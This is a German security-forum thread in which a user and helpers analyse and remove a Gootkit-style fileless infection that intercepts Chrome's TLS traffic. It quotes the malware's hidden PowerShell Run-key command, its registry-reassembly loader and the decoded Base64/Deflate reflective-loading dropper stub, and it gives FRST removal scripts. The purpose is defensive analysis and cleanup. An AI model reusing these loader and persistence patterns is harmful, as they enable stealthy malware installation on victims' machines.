Hallo,

ich habe jetzt noch keine nähren Analysen (FRST) machen können, da mit der PC noch nicht physisch zur Verfügung steht, möchte aber trotzdem schon mal das Problem schildern.

Seit zwei Tagen ist es so, dass Chrom, und nur Crome (Firefox und Brave ist nicht betrofen) bei jeder (!) Webseite meldet, dass das Zertifikat ungültig ist. Schaue ich mir die Zertifikate an, dann ist der Aussteller immer Godady. Vergleiche ich die Zertifikate ist der Rest (bis auf Serial, Key, usw.) identisch. Es liegt also nahe dass für Chrome der Traffic durch einen Proxy geleitet wird der versucht in den SSL-Traffic einzubrechen.

Ich habe im Zertifikatsstore ein Root-Zertifikat für 127.0.0.1 gefunden. Das reiche ich noch nach, habe ich im Moment nicht vorrätig. Das habe ich vorsorglich entfernt. Nach einem Neustart war das Problem dann weg. Am nächsten Tag war das Problem aber wieder da. Dann habe ich mich weiter umgesehen und in der Registry unter "Run" für den Benutzer folgendes gefunden:

Code: Alles auswählenAufklappen

ATTFilter

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('aebadbbdaffbef', 'User'))"
         

Die dort referenzierte Environment-Variable enthält:

Code: Alles auswählenAufklappen

ATTFilter

for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path 'HKCU:\SOFTWARE\aebadbbdaffbef').$i}Catch{}}IEX($abc)
         

Die dort referenzieren Registry-Keys habe ich exportiert und hier angehängt.

Das ist offensichtlich obfuskierter Powershell-Code. Lässt sich herausfinden was der tut?

So viel für Heute dazu, später mehr.

TIA
Matthias

Mein Name ist Matthias und ich werde dir bei der Analyse und der eventuell notwendigen Bereinigung deines Computers helfen.



Das sieht nach Malware aus, die über den Run-Value auf den Schlüssel in der Reg zeigt. Was die Malware macht, kann ich dir nicht sagen.
Es gibt aber Base64 Decoder/Encoder, evtl. bekommt man darüber was raus.

Du scheinst gut in der Materie bewandert zu sein, trotzdem bitte nichts selber löschen... zuerst FRST auszuführen.
Bitte poste die Logdateien von FRST, sobald du sie hast.

Bitte beachten - Unsere Regeln bei der Bereinigung - Welche Informationen wir benötigen:
Für alle Hilfesuchenden! Was muss ich vor der Eröffnung eines Themas beachten?

Hallo Namensvetter :-)

Base64 ... die Sache mit den Tomaten auf den Augen :-) gleich mal anschauen ... Das mit dem FRST wird noch ein bisschen dauern. Erst muss ich das Gerät in die Hand bekommen. Ich möchte es bis auf weiteres nicht mehr am Netz betreiben.

Eine Sache kann ich aber noch nachtragen: Der Windows-Defender hat mir die powershell.exe angemecker. Daraufhin habe ich mal Desinfect drauf losgelassen, allerdings ohne jedes Ergebnis.

Ok, danke für die Infos.

Bitte keine Tools mehr blind/alleine laufen lassen, sondern warten, bis von mir weitere Anweisungen kommen.


Warten wir die Logdateien von FRST ab, Spekulationen bringen nichts.

Servus,


wie sieht es aus?

Können wir dein System hier analysieren und bereinigen?
Oder hast du andere Pläne?

So, endlich habe ich die Logs ... habe mir erlaubt auch die Downloads der Privacy wegen zu bereinigen.

Hast du den HKU-run Wert der Malware (und ggf. weitere Einträge) bereits entfernt oder war das der Windows Defender?

Mal schauen, ob überhaupt noch was davon übrig ist....






Schritt 1

• Schließe alle offenen Programme und Internet Browser, damit keine Daten verloren gehen.
• Kopiere den gesamten Inhalt der folgenden Code-Box:
  
  Code: Alles auswählenAufklappen

  ATTFilter

  Start::
  HKLM-x32\...\Run: [] => [X]
  HKLM\ DisallowedCertificates: B47B03E57CE218674BA202EC9CB2B82702A7C1FB (U)
  DeleteKey: HKCU\Software\aebadbbdaffbef
  DeleteKey: HKCU\Environment\aebadbbdaffbef
  DeleteValue: HKCU\Environment|aebadbbdaffbef
  DeleteValue: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|aebadbbdaffbef
  CMD: ipconfig /flushdns
  CMD: netsh winsock reset
  CMD: netsh advfirewall reset
  CMD: netsh advfirewall set allprofiles state ON
  CMD: Bitsadmin /Reset /Allusers
  powershell: Set-MpPreference -PUAProtection Enabled
  Hosts:
  RemoveProxy:
  SystemRestore: On 
  EmptyTemp:
  End::
           

• Starte nun FRST und klicke direkt den Reparieren Button.
  Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
• Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
• Gegebenenfalls muss dein Rechner neu gestartet werden.
• Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Schritt 2

• Starte FRST erneut. Kopiere den Inhalt der folgenden Code-Box oben in das Suchfeld:
  
  Code: Alles auswählenAufklappen

  ATTFilter

  SearchAll: aebadbbdaffbef
           

• Klicke auf den Button Datei-Suche.
• FRST beginnt mit dem Suchlauf. Das kann einige Zeit dauern, bitte gedulde dich!
• Am Ende wird eine Textdatei Search.txt erstellt.
• Poste mir deren Inhalt mit deiner nächsten Antwort.

Schritt 3

• Starte FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
• FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
• Poste mir beide Logdateien mit deiner nächsten Antwort.

Bitte poste mit deiner nächsten Antwort:

• die Logdatei des FRST-Fix (fixlog.txt)
• die Logdatei des FRST-Suchlaufs (Search.txt)
• die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt)

Bis auf das Zertifikat habe ich nichts bearbeitet. Das Zertifikat habe ich auch nicht gelöscht sondern verschoben. Dass FRST nichts passendes gefunden hat liegt wohl daran, dass es nur den HKCU des angemeldeten Users durchsucht und nicht alle. Ich habe mich jetzt als der Problemuser angemeldet und noch mal suchen lassen. Jetzt findet FRST auch die Keys. IMHO eine kleine Schwäche von FRST :-)

Die Logs sind im Anhang. Das Problemzertifikat habe ich auch exportiert und mit angehängt.

Mich würde primär interessieren was der Powershell-Code getan hat. Das entfernen wäre dann der zweite Schritt. Ich habe mal unter Linux versucht den Powershellcode zu Base64-decoden. Das gelingt mir aber nicht. Jetzt werde ich das noch unter Windows versuchen. Ich möchte unbedingt den Code sehen.

Ich habe den Powersehll-Code durchgearbeitet und so modifiziert ausgeführt, dass immer nur Dateien erzeugt werden und nichts weiter passiert. Zum Schluss kommt ein Binary heraus, welches auf Virustotal so aussieht:

https://www.virustotal.com/gui/file/973d0318f9d9aec575db054ac9a99d96ff34121473165b10dfba60552a8beed4/detection

Folgendes hat sich gezeigt. Das hier:

Code: Alles auswählenAufklappen

ATTFilter

for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path 'HKCU:\SOFTWARE\aebadbbdaffbef').$i}Catch{}}IEX($abc)
         

erzeugt aus den in der Registry gepeicherten Keys das hier:

Code: Alles auswählenAufklappen

ATTFilter

$EnCoFi = @'...sehr viel binäres ...'@
$DefSt = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EnCoFi),[IO.Compression.CompressionMode]::Decompress)
$UnFiBy = New-Object Byte[](587776)
$DefSt.Read($UnFiBy, 0, 587776) | Out-Null
[Reflection.Assembly]::Load($UnFiBy)
[Test]::Install1()
         

Das $UnFiBy ist dann der Schadcode, der dann auch erkannt wird. Den habe ich wiederum in eine Datei schreiben lassen und dann scannen lassen. Der ganze Powershellkram ist, wie man das halt so macht, nur der Dropper.

Meine Mutmassungen: Das wird so gemacht, damit nichts direkt auf der Platte zu finden ist. Durch den Autostart wird die Malware dann jedes Mal geladen. Der Defender hat aber trotzdem etwas mitbekommen, vielleicht per Verhaltensanalyse, und daher kommen die Meldungen für die powershell.exe

Meine Fragen:

Was ist zu tun ?
Kann man in der Registry sehen wann die Keys erzeugt wurden?

Zur Analyse von Gootkit kannst du hier etwas nachlesen:
BleepingComputer: Gootkit malware returns to life alongside REvil ransomware
Malwarebytes: German users targeted with Gootkit banker or REvil ransomware


Ich bin davon ausgegangen, dass du dich mit dem "infizierten Konto" angemeldet hast und nicht mit einem anderen Konto.




Primär geht es hier im Forum um die Entfernung der Malware. Wenn du das selbst in die Hand nehmen möchtest, ist das ok für mich, dann gib kurz Bescheid und wir kürzen das Ganze hier ab.





Ansonsten bitte die folgenden Schritte ausführen und die Logdateien posten....


Schritt 1

• Schließe alle offenen Programme und Internet Browser, damit keine Daten verloren gehen.
• Kopiere den gesamten Inhalt der folgenden Code-Box:
  
  Code: Alles auswählenAufklappen

  ATTFilter

  Start::
  HKLM-x32\...\Run: [] => [X]
  HKLM\ DisallowedCertificates: B47B03E57CE218674BA202EC9CB2B82702A7C1FB (U)
  HKU\S-1-5-21-922372908-1454336370-1889761472-1002\...\Run: [aebadbbdaffbef] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('aebadbbdaffbef', 'User'))" <==== ACHTUNG
  DeleteKey: HKU\S-1-5-21-922372908-1454336370-1889761472-1002\Software\aebadbbdaffbef
  DeleteKey: HKU\S-1-5-21-922372908-1454336370-1889761472-1002\Environment\aebadbbdaffbef
  DeleteValue: HKU\S-1-5-21-922372908-1454336370-1889761472-1002\Environment|aebadbbdaffbef
  DeleteValue: HKU\S-1-5-21-922372908-1454336370-1889761472-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|aebadbbdaffbef
  CMD: ipconfig /flushdns
  CMD: netsh winsock reset
  CMD: netsh advfirewall reset
  CMD: netsh advfirewall set allprofiles state ON
  CMD: Bitsadmin /Reset /Allusers
  powershell: Set-MpPreference -PUAProtection Enabled
  Hosts:
  RemoveProxy:
  SystemRestore: On 
  EmptyTemp:
  End::
           

• Starte nun FRST und klicke direkt den Reparieren Button.
  Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
• Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
• Gegebenenfalls muss dein Rechner neu gestartet werden.
• Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Schritt 2
Führe Malwarebytes' AntiMalware (MBAM) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.





Schritt 3
Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.






Bitte poste mit deiner nächsten Antwort:

• die Logdatei des FRST-Fix (fixlog.txt)
• die Logdatei von MBAM
• die Logdatei von AdwCleaner

Danke so weit, ich verstehe was das Script tun soll.

Eine letzte Frage: Ist es grundsätzlich eine gute Idee MBAM immer parallel zum Defender aktiv zu haben?

Ich werde den Rechner jetzt komplett platt machen, da ich nicht wissen kann was die Malware noch so alles gemacht hat.

Trotzdem werde ich das alles ausführen und der Vollständigkeit halber alle Logs posten.

Zitat:

Zitat von mahescho

Eine letzte Frage: Ist es grundsätzlich eine gute Idee MBAM immer parallel zum Defender aktiv zu haben?

Wir empfehlen immer nur einen Echtzeitschutz zu verwenden.
Eventuell lohnt sich ein Blick auf unsere Empfehlungen.

Zitat:

Zitat von mahescho

Ich werde den Rechner jetzt komplett platt machen, da ich nicht wissen kann was die Malware noch so alles gemacht hat.

Trotzdem werde ich das alles ausführen und der Vollständigkeit halber alle Logs posten.

Eine Neuinstallation ist nie verkehrt.

Die Logdateien musst du wegen mir aber dann nicht mehr posten, die Zeit kannst du dir sparen.

Alles Gute!





Dieses Thema scheint erledigt und wird aus unseren Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema.

Jeder andere bitte hier klicken und ein eigenes Thema erstellen.